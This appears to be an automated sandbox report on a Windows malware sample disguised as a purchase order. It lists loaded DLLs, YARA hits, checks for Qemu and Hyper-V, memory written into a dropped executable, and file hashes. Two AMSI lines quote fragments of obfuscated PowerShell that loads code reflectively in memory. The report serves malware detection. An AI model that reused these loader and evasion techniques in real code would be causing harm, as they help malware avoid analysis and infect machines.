Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: Yara match	File source: 00000004.00000002.77583228848.000000000360D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.76792434686.000000000AF9D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Folkebaades $Statsraadssekretrens174 $Koruna), (talehandlinger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Rundstykkernes = [AppDomain]::CurrentDomain.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Rebolt226)), $Extensometres).DefineDynamicModule($Elsk, $false).DefineType($Bssemagers61, $Unstigmatised, [System.MulticastDelegate])$

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_033C9367 push eax; ret	2_2_033C9381
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_033C31BD push eax; retf	2_2_033C31E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07A79B2F pushad ; ret	2_2_07A79B39

Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXES9A
Source: powershell.exe, 00000002.00000002.76787212994.0000000007190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9884			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Window / User API: threadDelayed 2449			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	Last function: Thread delayed

Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000002.00000002.76790599173.0000000008BA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exes9a
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: Sammentrykket.exe, 00000004.00000002.77592666966.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77040018762.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77136726603.0000000004890000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000002.77592580545.0000000004891000.00000004.00000020.00020000.00000000.sdmp, Sammentrykket.exe, 00000004.00000003.77135363971.00000000048C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.76787212994.0000000007190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000002.00000002.76843108472.000000000C0C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe base: 1660000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Users\user\AppData\Local\Temp\Sammentrykket.exe base: 19FFF4			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior

ID:	1483268
Product:	CloudBasic
Start time:	23:53:11
Start date:	26.07.2024
Sample:	PO Tournefortian2453525525235235623425523235.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	d332bcaa3c61494b774f49bf3e716c21
SHA1:	8cdfa60c6b3f25c7d48753e50c298b746c3386de
SHA256:	d61208c85ce83c279dd87495f0dfc1cf5c345d2bf3a6e739279dcf188e19b21d
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Sammentrykket.ex_cdfd49ac3b26af801454be8ec917eccd673abd_e2f5391c_b8644a7e-ca96-4b2b-b9fa-9dcfc50dcc2a\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	0574D4BF3B19C82ED766B356EBA8968D	31BB5240ABBBF57C0529396007005F45056E4824	E37281A276D1679B58DBDA9579C816D52A3F9DE8EA6A87C72849491A15B664E2
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F81.tmp.dmp	Mini DuMP crash report, 14 streams, Fri Jul 26 21:56:40 2024, 0x1205a4 type	5CBCCCFAC424ED8C06D6340FB6EB0B40	5C7916D45742828D7B7AA087992B2F33935E2C3C	43BCF5FF9FA0EE8DE370A685692D2A442BBE927451DD8304EC8ADA9BF8B9E161
C:\ProgramData\Microsoft\Windows\WER\Temp\WER302E.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	C8050F0AAA30699748802287100ED561	64CA7593592F5B8185601431113DA97D8338637F	51FA7247360A7D7B215B9E42B2D368E69FE518D1B9D65173BBC0C25B0E22A93C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER304E.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	1C1DE4679B9F2733347EC9B13012B608	E54AA1E50B39873EE8C130DF6D4E89ACF12E0F9D	2C10C48FA6B9F4700A2528A3D2B4B31023B3909E9455A2BBA3BB55AD2BB42545
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Temp\Sammentrykket.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	D332BCAA3C61494B774F49BF3E716C21	8CDFA60C6B3F25C7D48753E50C298B746C3386DE	D61208C85CE83C279DD87495F0DFC1CF5C345D2BF3A6E739279DCF188E19B21D
C:\Users\user\AppData\Local\Temp\Sammentrykket.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ig332v4d.ytz.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_siybcszv.ei5.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Biteless96.Arb16	data	BD9481DFBA36E80E3106B60BDE4E13D4	A313DBA340750E640CB618F6E867C9B1760C3AE3	CC344F3AC0C321E5EF6178667B2639EE83331ACD77A77D2D9792F00590E24C5B
